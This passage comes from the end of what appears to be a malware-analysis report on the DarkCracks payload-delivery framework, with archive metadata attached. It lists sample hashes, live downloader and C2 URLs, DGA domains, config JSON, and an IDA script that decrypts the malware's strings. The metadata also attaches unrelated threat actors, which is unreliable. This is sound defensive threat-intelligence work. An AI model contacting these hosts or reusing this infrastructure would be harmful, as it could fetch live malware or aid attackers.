*wk8dnj2k-mipsel-uclibc\r\n93a7cba1edbacb633021ebc38c10a79f *wk8dnj2k-x64\r\ne587cd53059f58526be7e2167cf7177b *wk8dnj2k-x64-musl\r\n5340ee724893fd596852f22ecbc3e795 *wk8dnj2k-x86\r\nClient\r\naf93dc3d635ed3b46439e38fae8ecf6b *mY5bJK7e-armv5-uclibc\r\nb0f7df80d2adda176f8d58a55b773eed *mY5bJK7e-armv5-uclibc.decrypted\r\n7d6ea278b5ae9081c03e340d6f98a4a5 *mY5bJK7e-armv6-gnu\r\n635a7ae54cb7966d61e2e8f64391e870 *mY5bJK7e-armv6-gnu.decrypted\r\nc1d07c102e436284d3fbce0410658ae8 *mY5bJK7e-armv8-gnu\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 24 of 28\n\n11d4db491fe82e37ff0a5c3787cfa143 *mY5bJK7e-armv8-gnu.decrypted\r\n4e64816a821ce2eb231a5be5395a2f20 *mY5bJK7e-mips-uclibc\r\n2e7d67a3be72c5d1718fc2689c0d5d08 *mY5bJK7e-mips-uclibc.decrypted\r\n5e9bf8a980bcc4d004ff505778b843e6 *mY5bJK7e-mipsel-uclibc\r\n527cc24f043c58101c122c2a2f6c6d8e *mY5bJK7e-mipsel-uclibc.decrypted\r\n5b39497af0d9874d38288476d3a9f5a4 *mY5bJK7e-x64\r\ndffee792a8e65d38d897bd3400aecd3d *mY5bJK7e-x64.decrypted\r\n7515282b084374d9d8b87e46b87e4af8 *mY5bJK7e-x64-musl\r\nee0d3c3c528034fa3ebdc37596014382 *mY5bJK7e-x64-musl.decrypted\r\nd41c379725973e97ef9cbafb1efdb2f3 *mY5bJK7e-x86\r\n1d407ff91ce19afc82f7946c3ec24dea *mY5bJK7e-x86.decrypted\r\na1f3e574799c3f874a8d3563dbc55f4c *se3hf6jwc-armv5-uclibc\r\nad831d9c00c90fead925f4575f4a6a9a *se3hf6jwc-armv5-uclibc.decrypted\r\n2b5df28714421d79ab3e63eac538d853 *se3hf6jwc-armv6-gnu\r\n2107625e9980d190e3214ef09a83608f *se3hf6jwc-armv6-gnu.decrypted\r\n35f846e24d0cccb5a3ec736c07f6a0a2 *se3hf6jwc-armv8-gnu\r\n5fbe460fc8fa09dc6adc73e5e908cd0e *se3hf6jwc-armv8-gnu.decrypted\r\n27f18a27942fbb71c4e84736db45b5cf *se3hf6jwc-mips-uclibc\r\ne1674821a190f5250e6aba40916c9061 *se3hf6jwc-mips-uclibc.decrypted\r\nb1040f3193d4bec01b13bc73ecaa2587 *se3hf6jwc-mipsel-uclibc\r\n7c33c052c5d451ba4069639286dfc4b5 *se3hf6jwc-mipsel-uclibc.decrypted\r\n81eccc9c10368aa54cfed371f83da45a *se3hf6jwc-x64\r\nfe5f484f71bf0fd7afa56e60da7eec6f *se3hf6jwc-x64.decrypted\r\n08169e20daaad052075bd4026c8e287f *se3hf6jwc-x64-musl\r\n2caf09452e79390f09bebf27dad9acf4 *se3hf6jwc-x64-musl.decrypted\r\n5421bc92f2dd8f37538c2023c1e2f8ee *se3hf6jwc-x86\r\n7168f47f067d260c34543e32a7a55cbd *se3hf6jwc-x86.decrypted\r\nConfig\r\n4e52426a96baf84431775adf2d6f0ae2 *j8UgL3v\r\n4a642a86a8d8e71e5f163fa54eda9241 *qoakeifm-unknown.txt\r\nDownloader\r\nhttps://www.auntyaliceschool.site/wp-admin/maint/{se3hf6jwc|wk8dnj2k}\r\nhttp://179.191.68.85:82/vendor/sebastian/diff/src/Exception/{mY5bJK7e|pQ1iM9hd}\r\nhttp://45.169.87.67/vendor/sabre/event/lib/Promise/{se3hf6jwc|wk8dnj2k}\r\nC2 (Victims)\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 25 of 28\n\nhttp://187.190.1.137/vendor/guzzlehttp/guzzle/src/Exception/detail.php\r\nhttp://204.199.192.44/vendor/paragonie/sodium_compat/src/Core32/Poly25519.php\r\nhttp://148.102.51.6/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php\r\nhttp://158.177.2.191/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php\r\nhttp://64.227.0.146/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php\r\nhttp://216.238.103.62:8013/vendor/guzzlehttp/guzzle/src/Exception/DNSException.php\r\nhttp://52.0.85.62/vendor/guzzlehttp/guzzle/src/Exception/detail.php\r\nhttps://www.miracles.com.hk/wp-content/plugins/foxiplugin/detail.php\r\nhttp://152.67.11.54/wordpress//wp-admin/includes/sus.php\r\nDGA C2\r\n202301-202312\r\nkTD7YgOAgjL.com\r\ngTD7YgOAgjL.com\r\nsTD7YgOAgjL.com\r\nEVD7YgOAgjL.com\r\nAVD7YgOAgjL.com\r\nMVD7YgOAgjL.com\r\nIVD7YgOAgjL.com\r\nUVD7YgOAgjL.com\r\nQVD7YgOAgjL.com\r\nYTC7YgOAgjL.com\r\nkTC7YgOAgjL.com\r\ngTC7YgOAgjL.com\r\n202401- 202408\r\nkTDFUgOAgjL.com\r\ngTDFUgOAgjL.com\r\nsTDFUgOAgjL.com\r\nEVDFUgOAgjL.com\r\nAVDFUgOAgjL.com\r\nMVDFUgOAgjL.com\r\nIVDFUgOAgjL.com\r\nUVDFUgOAgjL.com\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 26 of 28\n\nC2\r\n216.74.123.97 United States|California|Los Angeles AS834|IPXO LLC\r\n213.139.233.163 Japan|Osaka|Osaka AS34985|ASN block not managed by the RIPE NCC\r\nConfigs\r\nGithub\r\nAddress: https://github[.]com/adrhpbrn29/sudoku1\r\n{\"url\":\"http://148.102.51.6/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php\",\"authHeader\":\"LJHRQWE\",\"\r\n{\"url\":\"http://148.102.51.6/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php\",\"authHeader\":\"LJHRQWE\",\"\r\n{\"url\":\"http://148.102.51.6/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php\",\"authHeader\":\"LJHRQWE\"}\r\n{\"url\":\"http://158.177.2.191/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php\",\"authHeader\":\"SLDJKFA\"}\r\n{\"url\":\"http://64.227.0.146/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php\",\"authHeader\":\"Linux Max\"\r\n{\"url\":\"http://216.238.103.62:8013/vendor/guzzlehttp/guzzle/src/Exception/DNSException.php\",\"authHeader\":\"Rbz021\r\nPastebin\r\nAddress:https://pastebin[.]com/GYEBVyMR\r\n{\"url\":\"http://52.0.85.62/vendor/guzzlehttp/guzzle/src/Exception/detail.php\",\"authHeader\":\"GGSEDPHP\",\"clientUrl\"\r\nAppendix\r\nIDA Script\r\n# Install flare_emu first\r\n# Only test with 93a7cba1edbacb633021ebc38c10a79f\r\n# Modify 'decstr_addr' in in your case\r\nimport flare_emu\r\nimport base64\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 27 of 28\n\nimport string\r\ndef decode(cipher):\r\n tmp = cipher[::-1] + b\"=\" * ((4 - len(cipher) % 4) )\r\n out = bytearray()\r\n for i, v in enumerate(base64.urlsafe_b64decode(tmp)):\r\n cha = v ^ key[i % len(key)]\r\n if chr(cha) in string.ascii_letters:\r\n cha ^= 0x20\r\n out.append(cha)\r\n out += b\"=\" * ((4 - len(out) % 4) % 4)\r\n return base64.urlsafe_b64decode(out)\r\ndef iterateCallback(eh, address, argv, userData):\r\n ro=ida_segment.get_segm_by_name(\".rodata\")\r\n if ro.start_ea \u003c= argv[0] \u003c=ro.end_ea:\r\n buff=eh.getEmuString(argv[0])\r\n if len(buff)\u003e0:\r\n \r\n \r\n plain=decode(buff)\r\n print(hex(argv[0]),buff,\"\u003c==============\u003e\",plain)\r\n ida_bytes.put_bytes(argv[0],b'\\x00'*len(buff))\r\n ida_bytes.put_bytes(argv[0],plain)\r\n \r\ndecstr_addr=0x0000FCD0\r\nkey=bytes.fromhex('43 72 61 63 6B 61 6C 61 63 6B 69 6E 27')\r\neh=flare_emu.EmuHelper()\r\neh.iterate(decstr_addr,iterateCallback)\r\nCyberChef\r\nhttps://gchq.github.io/CyberChef/#recipe=AES_Decrypt(%7B'option':'Hex','string':'2D%208C%207F%20EE%2042%20D3%20\r\nSource: https://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nhttps://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/\r\nPage 28 of 28", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/" ], "report_names": [ "darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework" ], "threat_actors": [ { "id": "5d2bd376-fcdc-4c6a-bc2c-17ebbb5b81a4", "created_at": "2022-10-25T16:07:23.667223Z", "updated_at": "2026-04-10T02:00:04.705778Z", "deleted_at": null, "main_name": "GCHQ", "aliases": [ "Government Communications Headquarters", "Operation Socialist" ], "source_name": "ETDA:GCHQ", "tools": [ "Prax", "Regin", "WarriorPride" ], "source_id": "ETDA", "reports": null }, { "id": "68cc6e37-f16d-4995-a75b-5e8e2a6cbb3d", "created_at": "2024-05-01T02:03:07.943593Z", "updated_at": "2026-04-10T02:00:03.795229Z", "deleted_at": null, "main_name": "BRONZE EDISON", "aliases": [ "APT4 ", "DarkSeoul", "Maverick Panda ", "Salmon Typhoon ", "Sodium ", "Sykipot ", "TG-0623 ", "getkys" ], "source_name": "Secureworks:BRONZE EDISON", "tools": [ "Gh0st RAT", "Wkysol", "ZxPortMap" ], "source_id": "Secureworks", "reports": null }, { "id": "d4ac28d1-66eb-4f2d-9f9b-a72394349fd0", "created_at": "2023-01-06T13:46:38.667954Z", "updated_at": "2026-04-10T02:00:03.061447Z", "deleted_at": null, "main_name": "APT4", "aliases": [ "PLA Navy", "MAVERICK PANDA", "BRONZE EDISON", "SODIUM", "Salmon Typhoon" ], "source_name": "MISPGALAXY:APT4", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6fbff48b-7a3e-4e54-ac22-b10f11e32337", "created_at": "2022-10-25T16:07:23.318008Z", "updated_at": "2026-04-10T02:00:04.539063Z", "deleted_at": null, "main_name": "APT 4", "aliases": [ "APT 4", "Bronze Edison", "Maverick Panda", "Salmon Typhoo", "Sodium", "Sykipot", "TG-0623", "Wisp Team" ], "source_name": "ETDA:APT 4", "tools": [ "Getkys", "Sykipot", "Wkysol", "XMRig" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434708, "ts_updated_at": 1775826725, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/8f5cd75afa28ad746878a11cc39117822e9caeaa.pdf", "text": "https://archive.orkl.eu/8f5cd75afa28ad746878a11cc39117822e9caeaa.txt", "img": "https://archive.orkl.eu/8f5cd75afa28ad746878a11cc39117822e9caeaa.jpg" } }